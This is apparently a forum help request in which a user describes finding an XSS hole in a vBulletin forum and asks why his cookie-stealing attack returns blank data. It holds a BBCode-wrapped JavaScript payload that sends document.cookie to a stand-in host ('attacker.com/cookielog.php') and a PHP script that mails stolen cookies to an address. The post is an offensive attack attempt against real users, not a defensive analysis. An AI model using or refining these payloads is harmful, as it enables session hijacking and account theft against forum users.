Injector |
Active user |
|
|
Joined: Dec 29, 2004 |
Posts: 49 |
|
|
|
|
|
|
|
I found a forum vulnerable to XSS. Basically using the [IMG tag thing. If i do something like this, it does show my cookie
Code: | alert(document.cookie) |
Now what i want to do is to mail or to log the cookie but everytime I do that I get nothing but blank.
I used this script:
Code: | <?php
$cookie = $_GET['cookie'];
mail('mehere@yahoo.com', 'cookie', $cookie);
?> |
I receive a cookie email but its blank It doesnt contain no data. I am trying to do this on vbulletin forum.
And the tag im using is something like Code: | [COLOR=[IMG]http://somesit.com/sad.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="http://attacker.com/cookielog.php?"+document.cookie) [/COLOR] |
Where am i going wrong? |
|